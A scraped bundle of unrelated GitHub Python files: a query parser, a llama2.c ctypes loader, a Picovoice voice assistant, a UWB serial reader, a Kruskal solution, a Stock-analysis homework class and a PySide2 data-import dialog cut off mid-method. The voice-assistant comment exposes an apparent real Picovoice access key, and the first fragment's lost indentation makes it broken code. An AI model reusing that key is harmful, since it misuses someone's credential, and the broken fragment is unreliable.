for cons in temp:
conditions.append(cons.strip())
# print(conditions)
select.append(conditions)
# print(select)
having = []
if temp.lower().__contains__('having'):
temp = file.readline()
if not temp.lower().__contains__('where'):
having = ''
having += temp
having = having.split('and')
having = [val.strip() for val in having]
# print(having)
where = ''
if temp.lower().__contains__('where'):
where = file.readline().strip()
attr.emfAttributes(selectAttributes, n, groupAttributes, f_vect, select, having, where)
# print(attr.f_Vect)
return attr
def output(self, attributes, manage):
file = open('/Users/shubhamjain/CS562/project/output/output.py', 'w+')
final_write = finalWrite()
final_write.setFileName(file.name)
imports = ['from configparser import RawConfigParser','import psycopg2']
final_write.setImports(imports)
final_write.setStructDB(manage.getStructDB())
final_write.setAttributes(attributes)
final_write.outputFile(manage)
for write in final_write.returns:
file.write(write)
# print()
return file.name
#
# fileInput = FileInput()
# fileInput.InputFile()
| itshubhamjain/CS562 | project/src/FileInput.py | FileInput.py | py | 4,399 | python | en | code | 0 | github-code | 36 |
7341734490 | import sys
import os
import ctypes
from ctypes import (
c_double,
c_int,
c_float,
c_char_p,
c_int32,
c_uint32,
c_void_p,
c_bool,
POINTER,
_Pointer, # type: ignore
Structure,
Array,
c_uint8,
c_size_t,
)
import pathlib
from typing import List, Union
# Load the library
def _load_shared_library(lib_base_name: str):
# Construct the paths to the possible shared library names
_base_path = pathlib.Path(__file__).parent.resolve()
# Searching for the library in the current directory under the name "libllama" (default name
# for llamacpp) and "llama" (default name for this repo)
_lib_paths: List[pathlib.Path] = []
# Determine the file extension based on the platform
if sys.platform.startswith("linux"):
_lib_paths += [
_base_path / f"lib{lib_base_name}.so",
]
elif sys.platform == "darwin":
_lib_paths += [
_base_path / f"lib{lib_base_name}.so",
_base_path / f"lib{lib_base_name}.dylib",
]
elif sys.platform == "win32":
_lib_paths += [
_base_path / f"{lib_base_name}.dll",
]
else:
raise RuntimeError("Unsupported platform")
cdll_args = dict() # type: ignore
# Add the library directory to the DLL search path on Windows (if needed)
# Try to load the shared library, handling potential errors
for _lib_path in _lib_paths:
print("_lib_path = ", _lib_path)
if _lib_path.exists():
try:
return ctypes.CDLL(str(_lib_path), **cdll_args)
except Exception as e:
raise RuntimeError(f"Failed to load shared library '{_lib_path}': {e}")
raise FileNotFoundError(
f"Shared library with base name '{lib_base_name}' not found"
)
# Specify the base name of the shared library to load
_lib_base_name = "model"
# Load the library
_lib = _load_shared_library(_lib_base_name)
# LLAMA_API struct llama_context_params llama_context_default_params();
def inference(argv: c_char_p):
return _lib.inference(argv)
#_lib.inference.argtypes = [c_int, c_char_p]
_lib.inference.restype = c_char_p
if __name__ == "__main__":
inference(bytes( "stories15M.bin", encoding = 'utf-8'))
| mengbingrock/shepherd | shepherd/llama2c_py/llama2c_py.py | llama2c_py.py | py | 2,276 | python | en | code | 0 | github-code | 36 |
23497341801 | ################ Henri Lahousse ################
# voice assistant
# 05/31/2022
# libraries
import struct
import pyaudio
import pvporcupine # for wakeword
import pvrhino # for situations
porcupine = None
pa = None
audio_stream = None
rhino = None
# documentation picovoice https://picovoice.ai/docs/
# create model wakeword https://console.picovoice.ai/ppn
# create model situation https://console.picovoice.ai/rhn
access_key = 'ENTER_KEY' # find on picovoice website https://console.picovoice.ai/access_key // my_key 0nevFcYH3LlyYTajYWkG44d+vLWdm5Njxe8tr6xNrj/Kn9/m2qOjeg==
def voice_ass():
porcupine = pvporcupine.create(
access_key=access_key,
keyword_paths=['ENTER_PATH'] # download model from website and extract file for wakeword detection // my_path /home/pi/Downloads/wakeword.ppn
)
# setup
def setup(path):
rhino = pvrhino.create(
access_key=access_key,
context_path=path)
return rhino
rhino_drive = setup('ENTER_PATH') # download model from website and extract for situation recognission // /home/pi/Downloads/drive.rhn
rhino_roof = setup('ENTER_PATH') # = // /home/pi/Downloads/roof.rhn
rhino_smartlights = setup('ENTER_PATH') # = // /home/pi/Downloads/smartlights.rhn
pa = pyaudio.PyAudio()
# prepare audio for processing
audio_stream = pa.open(
rate=porcupine.sample_rate,
channels=1,
format=pyaudio.paInt16,
input=True,
frames_per_buffer=porcupine.frame_length)
# prepare audio for processing
def audio(rhino):
audio_stream_rhn = pa.open(
rate=rhino.sample_rate,
channels=1,
format=pyaudio.paInt16,
input=True,
frames_per_buffer=rhino.frame_length)
return audio_stream_rhn
audio_sm = audio(rhino_smartlights)
audio_rf = audio(rhino_roof)
audio_dr = audio(rhino_drive)
while True:
pcm = audio_stream.read(porcupine.frame_length)
pcm = struct.unpack_from("h" * porcupine.frame_length, pcm)
keyword_index = porcupine.process(pcm)
# finalizing audio
def fin(aud, rhino):
rh = aud.read(rhino.frame_length)
rh = struct.unpack_from("h" * rhino.frame_length, rh)
is_finalized = rhino.process(rh)
return is_finalized
is_fin_sm = fin(audio_sm, rhino_smartlights)
is_fin_rf = fin(audio_rf, rhino_roof)
is_fin_dr = fin(audio_dr, rhino_drive)
# results, get the understood situation returned
def rs(is_fin, rhino):
if is_fin:
inference = rhino.get_inference() # if if_fin is True we get the inference
if inference.is_understood: # use intent and slots if it understands
intent = inference.intent # intent is a string
slots = inference.slots # slots is a dictionary
return intent, slots
# returns wakeword
if keyword_index == 0:
return 1
rs(is_fin_sm, rhino_smartlights)
rs(is_fin_rf, rhino_roof)
rs(is_fin_dr, rhino_drive)
porcupine.delete()
rhino.delete()
| lahousse/ONWARD | software/voice-assistant/voice-assis.py | voice-assis.py | py | 3,324 | python | en | code | 0 | github-code | 36 |
7305309200 | import serial
import serial
from time import sleep
import threading
import time
# sudo chmod 666 /dev/ttyACM0
device_port = "/dev/ttyACM0"
from multiprocessing.pool import ThreadPool
import settings
class uwb_data(threading.Thread):
def __init__(self,file_name,device_port):
threading.Thread.__init__(self)
self.file_name = file_name
self.serial = serial.Serial(device_port)
self.running = True
self.myval = []
def create_csv_file(self):
self.f = open(self.file_name, 'w+')
self.f.write("timestamp,x,y,z \n")
sleep(1)
def store_uwb_data(self):
val = str(self.serial.readline().decode().strip(' \r\n'))
if val.startswith('+DPOS:'):
val = val.strip('+DPOS:')
val = val.split(',')
self.myval = [int(float(val[2])),int(float(val[3]))]
def get_uwb_data(self):
return self.myval
def run(self):
while self.running:
self.store_uwb_data()
settings.myList = self.get_uwb_data()
def terminate(self):
"""clean stop"""
self.running = False
if __name__ == "__main__":
uwb_get_way = uwb_data('IDRdata.csv',"/dev/ttyACM0")
uwb_get_way.start()
pool = ThreadPool(processes=1)
try:
while True:
async_result = pool.apply_async(uwb_get_way.get_uwb_data)
return_val = async_result.get()
print(settings.myList)
except (KeyboardInterrupt, SystemExit):
uwb_get_way.terminate()
print("killed") | CoRotProject/FOF-API | Agents/UWB_agent/uwb_data.py | uwb_data.py | py | 1,567 | python | en | code | 0 | github-code | 36 |
43914377308 | # 도시 분할 계획
import sys
input = sys.stdin.readline
def find_parent(parent, x):
if parent[x] != x:
parent[x] = find_parent(parent, parent[x])
return parent[x]
def union_parent(parent, a, b):
a = find_parent(parent, a)
b = find_parent(parent, b)
# 더 작은 노드를 루트 노드로 설정
if a < b:
parent[b] = a
else:
parent[a] = b
# 입력 및 초기화
num_node, num_edge = map(int, input().split())
parent_table = [0] * (num_node+ 1) # 부모 테이블
edges = [] # 간선 리스트
result_edges = [] # 최종 비용
for i in range(1, num_node + 1):
parent_table[i] = i
for _ in range(num_edge):
a, b, cost = map(int, input().split())
edges.append((cost, a, b))
# 간선을 비용 오름차순으로 정렬
edges.sort()
# 크루스칼 알고리즘
for edge in edges:
cost, a, b = edge
# 사이클이 발생하지 않는 경우
if find_parent(parent_table, a) != find_parent(parent_table, b):
union_parent(parent_table, a, b)
# 신장 트리의 간선으로 선택(최종 비용에 포함)
result_edges.append(cost)
# 마을을 2개로 분할하되 유지비의 비용을 최소로 해야하므로 가장 큰 유지비를 하나 제외하고 출력한다.
print(sum(result_edges) - max(result_edges)) | yesjuhee/study-ps | Hi-Algorithm/week8/baekjoon_1647.py | baekjoon_1647.py | py | 1,375 | python | ko | code | 0 | github-code | 36 |
24547009552 | #!/usr/bin/python3
"""
function that prints a text with 2 new lines after each of\
these characters: ., ? and :
"""
def text_indentation(text):
"""
text_indentation -- print a text with 2 new lines after each of\
these characters
text -- recibe the Text
"""
if type(text) is not str:
raise TypeError("text must be a string")
"""
removes space only when it finds a matching character
"""
tok = 0
for i in text:
"""
if it found a character it removes the space continues
"""
if tok == 1 and i is ' ':
print('', end='')
tok = 0
continue
if i is '.' or i is '?' or i is ':':
print("{}\n".format(i))
tok = 1
else:
print(i, end='')
tok = 0
| adebudev/holbertonschool-higher_level_programming | 0x07-python-test_driven_development/5-text_indentation.py | 5-text_indentation.py | py | 821 | python | en | code | 0 | github-code | 36 |
9399875003 | # To add a new cell, type '#%%'
# To add a new markdown cell, type '#%% [markdown]'
#%% [markdown]
#
# # HW06
# ## By: xxx
# ### Date: xxxxxxx
#
#%% [markdown]
# Let us improve our Stock exercise and grade conversion exercise with Pandas now.
#
#%%
import dm6103 as dm
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
#%%
# Load the data frame from api
dfaapl = dm.api_dsLand('AAPL_daily', 'date')
print("\nReady to continue.")
dm.dfChk(dfaapl)
# What are the variables in the df?
# What are the data types for these variables?
#%%
# You can access pd dataframe columns using the dot notation as well as using column names
print(dfaapl.price, '\n')
# same as
print(dfaapl['price'])
#%%
# Step 1
# Create the Stock class
#
class Stock:
"""
Stock class of a publicly traded stock on a major market
"""
import dm6103 as dm
import os
import numpy as np
import pandas as pd
def __init__(self, symbol, name, init_tbname) :
"""
:param symbol: stock symbol
:param name: company name
:param init_tbname: the initial table name on our DSLand API with historical data. Date is index, with eod price and vol as columns.
"""
# note that the complete list of properties/attributes below has more than items than
# the numnber of arguments of the constructor. That's perfectly fine.
# Some property values are to be assigned later after instantiation.
self.symbol = symbol.upper()
self.name = name
self.data = self.import_history(init_tbname) # this is a pandas df, make sure import_history() returns a pd dataframe
# the pandas df self.data will have columns price, volume, delta1, delta2, and index is date
self.init_delta1() # Calculate the daily change values from stock price itself, append to df
self.init_delta2() # Calculate the daily values second derivative, append to df
self.firstdate = self.data.index[-1]
self.lastdate = self.data.index[0]
def import_history(self, tbname):
"""
import stock history from api_dsLand, with colunms date, eod_price, volume
"""
return dm.api_dsLand( tbname, 'date' ) # use date as index
def init_delta1(self):
"""
compute the daily change from price_eod, append to data as new column as delta1
"""
# notice that:
# aapl['price'] returns a pandas series
# aapl[['price']] returns a pandas dataframe
# aapl['price'].values returns a numpy array of the values only
self.data['delta1'] = 0 # initialize a new column with 0s
self.data['delta1'] = self.data['price'][0:-1] - self.data.price.values[1:] # self.data['price'] is same as self.price for df
# the first term on the right is the full pd series with index attached. Second one is a simple numpy array without the date
# index. That way, the broadcasting will not try to match the indices/indexes on the two df
return # you can choose to return self
def init_delta2(self):
"""
compute the daily change for the entire list of delta1, essentially the second derivatives for price_eod
"""
# essentially the same function as init_delta1.
self.data['delta2'] = 0 # initialize a new column with 0s
self.data['delta2'] = self.data.delta1[0:-1] - self.data.delta1.values[1:] # self.data['price'] is same as self.price for df
return # you can choose to return self
def add_newday(self, newdate, newprice, newvolume):
"""
add a new data point at the beginning of data df
"""
# Make plans
# insert a new row to self.data with
# (date, price, volume, delta1, delta2) to the pandas df,
# and also should update self.lastdate
#
# update self.lastdate
self.lastdate = newdate
# get ready a new row, in the form of a pandas dataframe.
# Pandas dataframe does not have an insert function. The usual method is to use .append()
# and .append() is most efficient to append a df to another df of the same columns.
newRow = self.setNewRow(newdate, newprice, newvolume) # we do this quite a lot: assume it's done already, then implement it later.
# need this function setNewRow() to return a dataframe
self.data = newRow.append(self.data) # this will put the new row on top, and push self.data after the new data
return self
def setNewRow(self, newdate, newprice, newvolume):
# first create a copy of the dataframe with a dummy first row
# the correct newdate is set as the index value for this 1-row dataframe
df = pd.DataFrame( dict( {'date': [ newdate ]}, **{ key: [0] for key in self.data.columns } ) )
df.set_index( 'date', inplace=True )
# df.index = [ newdate ] # this is already set properly above.
df.price[0] = newprice
df.volume[0] = newvolume
df.delta1[0] = newprice - self.data.price[0]
df.delta2[0] = df.delta1[0] - self.data.delta1[0]
return df
def nday_change_percent(self,n):
"""
calculate the percentage change in the last n days, returning a percentage between 0 and 100
"""
change = self.data.price[0]-self.data.price[n]
percent = 100*change/self.data.price[n]
print(self.symbol,": Percent change in",n,"days is {0:.2f}".format(percent))
return percent
def nday_max_price(self,n):
"""
find the highest price within the last n days
"""
return self.data.price[0:n].max()
def nday_min_price(self,n):
"""
find the lowest price within the last n days
"""
return self.data.price[0:n].min()
#%%
# Try these:
filename = 'AAPL_daily'
aapl = Stock('AAPL','Apple Inc',filename)
aapl.data.head()
aapl.data.tail()
aapl.nday_max_price(333) # record the answer here
aapl.nday_min_price(500) # record the answer here
aapl.nday_change_percent(500) # record the answer here
aapl.add_newday('9/13/19',218.42,12345678)
aapl.data.head()
# %%
| rajkumarcm/Data-Mining | Assignments/HW_Pandas/HW_pandas_stock_solution.py | HW_pandas_stock_solution.py | py | 5,856 | python | en | code | 0 | github-code | 36 |
17883995055 | # -*- encoding: utf-8 -*-
import logging
import os
import time
import numpy as np
import openpyxl
import pandas as pd
import xlrd
# 导入PyQt5模块
from PySide2.QtCore import *
from PySide2.QtWidgets import *
from dataImportModel import Ui_Form as dataImportFormEngine
from widgets import kwargs_to_str
from lib.comm import set_var, run_command
# 导入matlab加载模块
# 定义日志输出格式
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
class ImportDialog(QDialog):
signal_data_change = Signal(str, dict, str, str, str, str, str) # 自定义信号,用于传递文件路径
extension_lib = None
def __init__(self, parent=None):
super(ImportDialog, self).__init__(parent)
self.current_dataset: pd.DataFrame = None
self.import_message = {"isError": False, "warningMessage": []}
self.separator_char = [",", ";", "\\s", "\\t"]
self.encode_type = ["utf8", "gb2312", "gbk", "ascii"]
def importDatasetPreview(self):
pass
def getImportParam(self):
pass
def importDatasetReload(self):
pass
def updateTableView(self):
pass
def open_file(self, path: str):
assert os.path.exists(path)
self.lineEdit_filePath.setText(path)
self.previewButton()
def openfile(self):
"""
选择文件,需要支持三种场景:
(1)点击 “浏览” 按钮
(2)点击 “预览” 按钮
"""
path = self.lineEdit_filePath.text()
self.import_param.update(choosefile=False)
if not path:
# 先判断传入的 path 是否有内容,
path, openfile_type = QFileDialog.getOpenFileName(self, '选择文件', self.get_work_dir(),
"文件类型({})".format(self.file_types))
self.lineEdit_filePath.setText(path)
if path:
# 如果没有选择文件就关闭窗口,这时候path还是没有路径,datasetName 则清空
temp_name = (os.path.split(self.lineEdit_filePath.text())[1]).split(".")[0:-1]
# 获取文件名称,并将文件名称作为导入的变量名称,如果文件名称为空,则使用 temp 作为变量名称
dataset_name = "temp" if temp_name == [""] else ".".join(temp_name)
self.lineEdit_datasetName.setText(dataset_name)
else:
self.lineEdit_filePath.setText(self.import_param["filepath"])
def chooseFileButton(self):
"""选择文件按钮"""
self.lineEdit_filePath.setText("")
self.previewButton()
def previewButton(self):
"""预览按钮"""
self.import_param.update(ispreview=True)
self.openfile()
self.getImportParam()
if self.import_message["isError"]:
self.showWarningMessage()
else:
if self.lineEdit_filePath.text():
self.importDatasetLoad()
self.updateTableView()
def importDatasetButton(self):
"""对发送钱的数据验证"""
self.import_param.update(ispreview=False)
self.getImportParam()
if self.import_message["isError"]:
self.showWarningMessage()
return
# if self.import_param["filepath"] == "" or len(self.current_dataset) == 0:
if len(self.current_dataset) == 0:
self.showWarningMessage(info="导入失败!\n提示:请提供正确数据集")
return
var_name_check = self.updateDatasetVarname()
if var_name_check:
import sys
t0 = time.time()
self.importDatasetLoad()
self.sendDataset()
t1 = time.time()
logger.info("导入数据集所用时间: {t} s 大小 {m} MB".format(
t=round(t1 - t0, 2), m=round(sys.getsizeof(self.current_dataset) / 1024, 2)
))
self.current_dataset = None
def importDatasetLoad(self):
"""获取数据并做检验"""
error = ""
self.import_param.update(status=False)
try:
self.importDatasetReload()
self.import_param.update(status=True)
except UnicodeDecodeError as e:
encodetype = self.import_param["param"]["encoding"]
self.updateWarningMessage(info="指定的编码方式“{}”无法解码要打开的文件,请尝试其他编码方式".format(encodetype))
error = str(e)
except MemoryError as e:
self.updateWarningMessage(info="文件过大,超过内存上限,导入失败!")
error = str(e)
except Exception as e:
self.updateWarningMessage(info="导入失败,错误详情:\n{}".format(str(e)))
error = str(e)
if self.import_message["isError"]:
self.showWarningMessage()
return (error)
def getDatasetInfo(self, varname=""):
"""
获取变量的名称、数据结构等信息
目前暂不支持保留用户重新配置的字段数据类型方案
varname = 变量统一命名
"""
self.import_param.update(varname={}, dtypes={})
for k in self.current_dataset:
self.import_param["varname"][k] = varname if varname else k
if type(self.current_dataset[k]) == pd.DataFrame:
self.import_param["dtypes"][k] = self.current_dataset[k].dtypes
else:
self.import_param["dtypes"][k] = type(self.current_dataset[k])
def updateDatasetVarname(self):
"""
更新导入数据集时候的名称
TODO: 重置数据集名称
考虑到未来导入数据集时候需要重命名数据集的名称,可能会存在这几类场景:
(1)导入后的变量名称更新
【1】一个文件一个单变量(页面)导入
【2】一个文件多变量(页面)导入,导入后可能以一个字典导入,或是多个变量名称,如果数据结构都一致情况下,
可能还有合并成一个变量导入
(2)导入时候使用什么类型数据结构导入,数据框,字典,字符,列表等
(3)导入时候的数据结构的调整
(4)导入时候变量是否有存在,如果有存在,则需要提醒用户修改冲突的变量名称
因此考虑将这部分独立出来进行处理。
"""
# 使用当前“数据集名” / “页面” 的名称
self.newdatasetname = {"varname": {}}
e = self.import_param["datasetname"]
while True:
var_name, ok = QInputDialog.getText(self, "变量名", "输入新的变量名称:", QLineEdit.Normal, e)
if ok:
if len(var_name) == 0:
QMessageBox.warning(self, "提示", "请输入变量名称!")
continue
elif self.extension_lib.Data.var_exists(var_name):
# 在变量名称冲突情况下,允许用户判断是否覆盖变量名称
isCover = QMessageBox().question(None, "提示", "变量 {} 已经存在,是否覆盖?".format(var_name),
QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if isCover == QMessageBox.Yes:
break
else:
continue
elif not var_name.isidentifier():
QMessageBox.warning(self, '提示', '变量名无效\n提示:\n1、不要以数字开头;\n2、不要包含除下划线外的所有符号。')
else:
break
else:
ok = False
self.import_param.update(ispreview=True, status=True)
break
if ok:
self.newdatasetname["varname"][e] = var_name
# if self.import_param["ismerge"]:
# self.newdatasetname["datasetname"] = var_name
# self.import_param["datasetname"] = var_name
# else:
# self.newdatasetname["varname"][e] = var_name
# self.import_param["varname"][e] = var_name
return (ok)
def sendDataset(self):
"""
这个方法与具体导入sas,spss还是excel数据都是无关的。
其实意思就是把pandas数据加入到工作空间中。
"""
if self.import_param["status"]:
# if self.import_param["ismerge"]:
# set_var(self.newdatasetname["datasetname"], self.current_dataset)
# else:
for name_i, var_i in self.newdatasetname["varname"].items():
set_var(var_i, self.current_dataset[name_i]) # 将数据导入工作空间
QMessageBox.information(self, "{}导入结果".format(""), "数据导入完成!", QMessageBox.Yes)
self.close()
def clearImportParam(self):
"""重置数据集"""
self.current_dataset = {}
self.import_message = {"isError": False, "warningMessage": []}
self.import_param = {
"datasetname": "", # 数据集名称
"varname": {}, # 导入的变量名称,dict,用于后续存放更改变量名称后的结果
"filepath": "", # 文件路径
"hasheader": True, # 首行是否为列名称
"dtypes": {}, # 字段数据类型,dict,用于后续存放更改数据类型后的结果
"status": False, # 导入结果状态:True = 导入成功,False = 导入失败
"param": {}, # 导入面板上的参数,dict
"ispreview": True, # 是否预览
"ismerge": False # 多变量数据集是否合并成字典导入
}
def get_work_dir(self) -> str:
"""获取工作路径"""
return self.extension_lib.Program.get_work_dir()
def center(self):
"""将窗口置于中心"""
qr = self.frameGeometry()
cp = QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
def keyPressEvent(self, e):
"""按键盘Escape退出当前窗口"""
if e.key() == Qt.Key_Escape:
button = QMessageBox.question(self, "Question", "是否退出当前窗口?",
QMessageBox.Ok | QMessageBox.Cancel, QMessageBox.Ok)
if button == QMessageBox.Ok:
self.close()
def showWarningMessage(self, info=""):
"""显示异常信息"""
info = info if info else self.import_message["warningMessage"][0]
if info:
QMessageBox.warning(self, '警告:', info)
logging.info("获取数据警告:\n" + info)
def updateWarningMessage(self, info="", new=True):
"""更新导入状态"""
if new:
self.import_message["isError"] = True
self.import_message["warningMessage"].append(info)
else:
self.import_message["isError"] = False
self.import_message["warningMessage"] = []
def checkFilePath(self, path):
'''检查输入的文件路径是否合法'''
if path:
if not os.path.exists(path):
self.updateWarningMessage(info="数据集路径不存在,\n请重新输入数据集路径!")
if os.path.split(path)[-1].split(".")[-1].lower() not in self.file_types:
self.updateWarningMessage(
info="数据文件格式有错:\n仅支持({})类型文件,\n请重新输入数据集路径!".format(self.file_types)
)
return (path)
def checkRowsNumber(self, rows, types):
'''检查行数是否为正整数或“全部”'''
typesDict = {
"limitRows": "“限定行数”必须是大于等于0的整数或“全部”",
"skipRows": "“跳过行数”必须是大于等于0的整数"
}
if rows == "全部":
row_number = None
elif rows.isdigit():
row_number = int(rows)
else:
row_number = 0
self.updateWarningMessage(info="{}\n请重新输入!".format(typesDict[types]))
if self.import_param["ispreview"] and types == "limitRows":
# 判断是否为预览,或是限制行数
row_number = min([100, row_number if row_number else 101])
return (row_number)
def headerAsColumns(self, data):
"""首行为列名"""
colnames = pd.DataFrame([data.columns], index=[0], columns=data.columns.tolist())
data.index += 1
data = data.append(colnames, ignore_index=False)
data.sort_index(inplace=True)
data.columns = ["C" + str(i + 1) for i in range(data.shape[1])]
return (data)
def datasetUpdate(self, data, skiprow, limitrow):
"""对数据集的规模进行处理"""
data = data[data.index >= skiprow] # 跳过行数
if limitrow:
limitrows = min(data.shape[0], limitrow)
data = data.head(limitrows)
return (data)
def showDatasetPreview(self, data, header=True):
"""导入的数据集可视化"""
if not header:
# 首行不为列名情况下的处理
data = self.headerAsColumns(data)
table_rows, table_colunms = data.head(100).shape
table_header = [str(col_i) for col_i in data.columns.tolist()]
self.tableWidget_previewData.setColumnCount(table_colunms)
self.tableWidget_previewData.setRowCount(table_rows)
self.tableWidget_previewData.setHorizontalHeaderLabels(table_header)
# 数据预览窗口
for i in range(table_rows):
row_values = data.iloc[i].tolist()
for j, element in enumerate(row_values):
newItem = QTableWidgetItem(str(element))
newItem.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)
self.tableWidget_previewData.setItem(i, j, newItem)
def updateDatasetNameLine(self, tag):
"""更新数据集显示标签"""
new_datasetname = self.import_param["datasetname"] if tag == "(全部导入)" else tag
self.lineEdit_datasetName.setText(new_datasetname)
def clearPreviewDataTableWidget(self):
"""清理表格组件内容"""
self.tableWidget_previewData.clear()
self.showDatasetPreview(data=pd.DataFrame([]))
def showHelp(self):
from packages.pm_helpLinkEngine import helpLinkEngine as h
h.helpLink.openHelp("dataio_sample_showhelp")
# 数据库相关的方法
def checkTextNotNull(self, dicts):
"""检验输入内容是否为空"""
db_dict = {"host": "IP地址", "user": "用户名称", "passwd": "密码", "db": "数据库名称", "password": "密码",
"port": "IP端口", "charset": "数据类型", "table": "表格名称", "schema": "数据模式", "database": "数据库名称",
"server_name": "服务名称"}
for k, v in dicts.items():
if not v:
self.updateWarningMessage(info="‘{tag}’不能为空,请重新输入!".format(tag=db_dict[k]))
def updateDatabaseConnectStatusLabel(self, e=""):
tag = {"label": "连接成功", "color": "color: blue;"}
if e:
tag.update(label='连接失败:' + e, color="color: rgb(255, 0, 0);")
self.label_test.setHidden(False)
self.label_test.setText(tag["label"])
self.label_test.setStyleSheet(tag["color"])
def dbConnectTestButton(self):
"""检查数据库连接是否有效"""
self.import_param.update(ispreview=True)
self.getImportParam()
if self.import_message["isError"]:
self.showWarningMessage()
return
error = self.importDatasetLoad()
self.updateDatabaseConnectStatusLabel(error)
def dbDatasetImportButton(self):
"""导入数据按钮"""
self.import_param.update(ispreview=False)
self.getImportParam()
if self.import_message["isError"]:
self.showWarningMessage()
return
var_name_check = self.updateDatasetVarname()
if var_name_check:
import sys
t0 = time.time()
error = self.importDatasetLoad()
self.updateDatabaseConnectStatusLabel(error)
self.sendDataset()
t1 = time.time()
logger.info("导入数据集所用时间: {t} s 大小 {m} MB".format(
t=round(t1 - t0, 2), m=round(sys.getsizeof(self.current_dataset) / 1024, 2)
))
self.current_dataset = None
def getCurFetchData(self, cur):
"""获取数据库返回的分页数据"""
temp = pd.DataFrame([])
try:
cur.execute(self.import_param["sql"])
if cur.description:
temp = pd.DataFrame(data=list(cur.fetchall()),
columns=list(map(lambda x: x[0], cur.description)))
except Exception as e:
self.updateWarningMessage("导入失败,错误详情:\n{}" + str(e))
return (temp)
def updateChooseTagName(self, comboBox, tagname=[]):
""" 加载导入文件变量名称 """
comboBox.clear()
if not self.import_param["status"]:
return
if not tagname:
tagname = list(self.current_dataset)
tagname = ["(全部导入)"] + tagname if len(tagname) > 1 else tagname
for v in tagname:
# 更新Excel导入界面中"数据位置"列表
comboBox.addItem(v)
# 优化完成
class ImportTextForm(ImportDialog, dataImportFormEngine):
"""
"导入Text"窗口,包含方法:
(1)getImportParam:获取面板中的配置信息
(2)importDatasetReload:重新加载文件数据内容
(3)updateTableView:更新视图呈现数据
"""
def __init__(self, parent=None):
self.file_types = "*.csv *.txt *.tsv"
self.IconPath = ":/resources/icons/txt.svg"
super().__init__(parent)
self.setupUi(self)
self.center()
self.clearImportParam()
self.updateUIForm()
def AddUIFormActivity(self):
"""增加界面中的操作操作响应"""
self.checkBox_ifColumns.stateChanged.connect(self.updateTableView) # 选择首行是否为列名
self.checkBox_asString.stateChanged.connect(self.previewButton) # 是否以文本形式导入
self.comboBox_encode.currentTextChanged.connect(self.previewButton) # 选择编码方式
self.comboBox_separator.currentTextChanged.connect(self.previewButton) # 选择分割符号
def updateUIForm(self):
"""ImportTextForm配置参数部分"""
separator_char = ["\\n"] + self.separator_char
self.comboBox_encode = self.updateForm_ComboBox(self.comboBox_encode, self.encode_type)
self.comboBox_separator = self.updateForm_ComboBox(self.comboBox_separator, separator_char)
self.horizontalLayoutAddUI(self.checkBox_asString)
self.horizontalLayoutAddUI(self.checkBox_ifColumns)
self.verticalLayoutAddUI(self.lineEdit_datasetName, "left")
self.verticalLayoutAddUI(self.lineEdit_limitRow, "left")
self.verticalLayoutAddUI(self.lineEdit_skipRow, "left")
self.verticalLayoutAddUI(self.comboBox_separator, "right")
self.verticalLayoutAddUI(self.comboBox_encode, "right")
self.publicUIFormActivity()
self.AddUIFormActivity()
def getImportParam(self):
"""
获取界面中的配置信息
(1)首行列名(2)数据集名称(3)跳过行数(4)限定行数(5)文件编码(6)分割符号
"""
self.updateWarningMessage(new=False)
self.import_param.update(
datasetname=self.lineEdit_datasetName.text(),
filepath=self.lineEdit_filePath.text(),
hasheader=self.checkBox_ifColumns.isChecked(),
status=False, varname={}, dtypes={},
asString=self.checkBox_asString.isChecked(),
param={
"filepath_or_buffer": self.checkFilePath(self.lineEdit_filePath.text()),
"engine": "python",
"header": 'infer' if self.checkBox_ifColumns.isChecked() else None,
"sep": self.comboBox_separator.currentText(),
"encoding": self.comboBox_encode.currentText(),
"nrows": self.checkRowsNumber(self.lineEdit_limitRow.text(), "limitRows"),
"skiprows": self.checkRowsNumber(self.lineEdit_skipRow.text(), "skipRows")
}
)
def importDatasetReload(self):
"""
刷新导入的数据
file_path: 导入路径
"""
param = self.import_param["param"]
self.current_dataset = {}
varname = self.import_param["datasetname"]
if self.import_param["asString"]:
with open(file=param["filepath_or_buffer"], encoding=param["encoding"]) as f:
size = param["nrows"] if param["nrows"] else -1
temp = f.read(size)
f.close()
else:
temp = pd.read_table(**param)
# 文本一次只导入一个文件,因此默认变名称即为数据集名称
self.current_dataset[varname] = temp
self.getDatasetInfo()
self.import_param.update(status=True)
def updateTableView(self):
"""
刷新预览数据
"""
# 处理需要呈现的内容
self.clearPreviewDataTableWidget()
if not self.import_param["status"]:
return
dataset = self.current_dataset[self.import_param["datasetname"]]
if self.checkBox_asString.isChecked():
preview_data = pd.DataFrame({"文本": [dataset[:100]]})
header = True
else:
preview_data = dataset.head(100)
header = self.checkBox_ifColumns.isChecked()
self.showDatasetPreview(data=preview_data, header=header)
# 优化完成
class ImportCsvForm(ImportDialog, dataImportFormEngine):
"""导入CSV窗口"""
def __init__(self, parent=None):
self.IconPath = ":/resources/icons/csv.svg"
self.file_types = "*.csv"
super().__init__(parent)
self.setupUi(self)
self.center()
self.clearImportParam()
self.updateUIForm()
def AddUIFormActivity(self):
"""增加界面中的操作操作响应"""
self.checkBox_ifColumns.stateChanged.connect(self.updateTableView) # 选择首行是否为列名
self.checkBox_ifColIndex.stateChanged.connect(self.previewButton) # 首列是否为列名
self.comboBox_encode.currentTextChanged.connect(self.previewButton) # 选择编码方式
self.comboBox_separator.currentTextChanged.connect(self.previewButton) # 选择分割符号
def updateUIForm(self):
"""ImportTextForm配置参数部分"""
self.comboBox_separator = self.updateForm_ComboBox(self.comboBox_separator, self.separator_char)
self.comboBox_encode = self.updateForm_ComboBox(self.comboBox_encode, self.encode_type)
self.horizontalLayoutAddUI(self.checkBox_ifColumns)
self.horizontalLayoutAddUI(self.checkBox_ifColIndex)
self.verticalLayoutAddUI(self.lineEdit_datasetName, "left")
self.verticalLayoutAddUI(self.lineEdit_limitRow, "left")
self.verticalLayoutAddUI(self.lineEdit_skipRow, "left")
self.verticalLayoutAddUI(self.comboBox_separator, "right")
self.verticalLayoutAddUI(self.comboBox_encode, "right")
self.publicUIFormActivity()
self.AddUIFormActivity()
def getImportParam(self):
"""
获取界面中的配置信息
(1)首行列名(2)数据集名称(3)跳过行数(4)限定行数(5)文件编码(6)分割符号
"""
self.updateWarningMessage(new=False)
self.import_param.update(
datasetname=self.lineEdit_datasetName.text(),
